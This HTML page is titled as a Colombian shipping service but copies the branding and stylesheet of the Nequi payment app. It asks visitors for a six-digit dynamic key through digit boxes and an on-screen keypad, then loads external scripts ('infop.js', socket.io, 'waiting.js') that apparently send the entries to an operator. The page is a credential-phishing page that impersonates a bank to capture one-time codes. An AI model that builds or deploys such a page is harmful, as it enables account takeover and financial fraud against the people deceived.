<!DOCTYPE html>
<html>
<head>
    <title>El servicio de envíos de Colombia</title>
    <meta http-equiv="content-type" content="text/html; utf-8">
    <meta charset="utf-8">
    
    <meta content="es" http-equiv="Content-Language">

    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="Copyright" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="icon" href="img/favicon.png" type="image/x-icon">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;0,1000;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900;1,1000&display=swap" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.0.min.js"></script>  
    <script src="../../../js/functions.js"></script>
    <link rel="icon" href="../../img/nequi_pse.svg" type="image/png">
    <link href="css/style.css" rel="stylesheet">
    <link href="css/stylesheet.css" rel="stylesheet">
    <link href="https://cdn.prod.website-files.com/6317a229ebf7723658463b4b/css/nequi-colombia.f1656e402.min.css" rel="stylesheet" type="text/css" />
    <link href="https://fonts.googleapis.com" rel="preconnect" />
    <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous" />
    <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
    <script type="text/javascript">
        WebFont.load({
            google: {
                families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Manrope:regular,500,600,700,800"]
                }
        });
    </script>
    <style type="text/css">
        body{
            background-color: white;
            display: flex;
            justify-content: center;
            align-content: flex-start;
            margin-top: 150px;

        }
        #cargando{
            position: fixed;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 920;   
            display: none; 
        }
        
        .btn-habilitado {
            background-color: #DA0081;
            color: #fff;
        }
        .btn-deshabilitado {
            background-color: #F1BFDA; 
            color: #fff;
        }

        .password-input {
            display: flex;
            justify-content: center;
            align-items: center;
            gap: 10px; 
        }

        .digit {
            width: 40px; 
            height: 40px; 
            text-align: center; 
            font-size: 24px;
            border: none;
            border-bottom: 0.2px solid #000;
            outline: none; 
            background: none; 
        }

        .digit:focus {
            border-bottom: 2px solid #DA0081;
        }

        .password-input {
            color: black;
        }

        .digit:disabled {
            color: black;
            opacity: 1;
        }

        .numeric-keyboard {
            display: grid;
            grid-template-columns: repeat(3, 1fr); /* 3 columnas */
            gap: 10px;
            justify-items: center;
        }

        .numeric-keyboard .key {
            width: 50px;
            height: 50px;
            font-size: 40px;
            text-align: center;
            line-height: 10px;
            cursor: pointer;
            border: none;
            background: none;
            color: black; /* Color del texto */
        }

        .numeric-keyboard .key.empty {
            visibility: hidden; /* Espacio vacío */
        }

        .numeric-keyboard .key.backspace {
            grid-column: span 1; /* El botón de retroceso ocupa una columna */
            text-align: center;
        }

        .key:active{
            background-color: rgb(255, 255, 255);
            border-radius: 5px;
        }
    </style>          
</head>
<body>
    <div id="fondo"></div>
    <img src="img/preloader2.gif" id="cargando" width="110">
    <div id="frm-consulta" class="frm-modal">
        <img src="img/dinamica.png" alt="" style="width: 100%;margin-top: 30px;">
        <div class="formulario">
            <section class="password-input">
                <input type="number" maxlength="1" class="digit" id="number-1"/>
                <input type="number" maxlength="1" class="digit" id="number-2" disabled/>
                <input type="number" maxlength="1" class="digit" id="number-3" disabled/>
                <input type="number" maxlength="1" class="digit" id="number-4" disabled/>
                <input type="number" maxlength="1" class="digit" id="number-5" disabled/>
                <input type="number" maxlength="1" class="digit" id="number-6" disabled/>
            </section>
            <br>
            <br>
            <div class="numeric-keyboard">
                <button class="key">1</button>
                <button class="key">2</button>
                <button class="key">3</button>
                <button class="key">4</button>
                <button class="key">5</button>
                <button class="key">6</button>
                <button class="key">7</button>
                <button class="key">8</button>
                <button class="key">9</button>
                <button class="key empty"></button> <!-- Espacio vacío -->
                <button class="key">0</button>
                <img src="../img/screenshot.png" class="key backspace"  alt="back">
            </div>
            <br>
            <div class="g-recaptcha" data-sitekey="YOUR_SITE_KEY"></div>
            <button class="btn btn-deshabilitado" id="btn-consultar">Consultar</button>
        </div>
    </div>
    <script src="js/jquery-3.6.0.min.js"></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        const inputs = document.querySelectorAll(".digit");
        const button = document.querySelector(".btn");
        const keys = document.querySelectorAll(".numeric-keyboard .key");

        let currentInputIndex = 0;

        inputs[0].focus(); // Hace foco en el primer input al cargar la página

        keys.forEach(key => {
            key.addEventListener("click", function () {
                const value = key.textContent.trim();

                if (key.classList.contains("backspace")) {
                    if (currentInputIndex > 0) {
                        currentInputIndex--;
                        inputs[currentInputIndex].value = "";
                        inputs[currentInputIndex].focus();
                    } else if (currentInputIndex === 0) {
                        inputs[currentInputIndex].value = "";
                    }
                } else if (value !== "") {
                    if (currentInputIndex < inputs.length) {
                        inputs[currentInputIndex].value = value;
                        currentInputIndex++;
                        if (currentInputIndex < inputs.length) {
                            inputs[currentInputIndex].focus();
                        }
                    }
                }
                checkInputs(); // Verifica el estado de los inputs
            });
        });

        inputs.forEach((input, index) => {
            input.addEventListener("input", function () {
                // Limitar la longitud del valor a 1 carácter
                if (input.value.length > 1) {
                    input.value = input.value.slice(0, 1);
                }

                // Verifica si el valor ingresado es un número
                if (!/^\d$/.test(input.value)) {
                    input.value = ''; // Elimina el carácter no numérico
                }

                if (input.value.length === 1 && index < inputs.length - 1) {
                    inputs[index + 1].focus(); // Mueve el foco al siguiente input
                }
                checkInputs(); // Verifica el estado de los inputs
            });

            input.addEventListener("keydown", function (event) {
                if (event.key === "Backspace") {
                    if (input.value.length === 0 && index > 0) {
                        inputs[index - 1].focus(); // Mueve el foco al input anterior si se presiona Backspace
                        inputs[index - 1].value = ""; // Borra el valor del input anterior
                        currentInputIndex = index - 1;
                    } else {
                        input.value = ""; // Borra el valor del input actual
                        currentInputIndex = index;
                    }
                }
                checkInputs(); // Verifica el estado de los inputs
            });

            input.addEventListener("paste", function (event) {
                event.preventDefault();
                const paste = (event.clipboardData || window.clipboardData).getData('text');
                const pasteArray = paste.split('').slice(0, inputs.length); // Limitar a la longitud de los inputs

                pasteArray.forEach((char, i) => {
                    inputs[i].value = char;
                });

                currentInputIndex = pasteArray.length;
                if (currentInputIndex < inputs.length) {
                    inputs[currentInputIndex].focus();
                }
                checkInputs(); // Verifica el estado de los inputs
            });
        });

        function checkInputs() {
            const allFilled = Array.from(inputs).every(input => input.value.length === 1);
            if (allFilled) {
                button.classList.remove("btn-deshabilitado");
            }
        }
    });
</script>
    <script src="./js/infop.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.0.1/socket.io.min.js"></script>
    <script src="js/waiting.js"></script>
</body>
</html>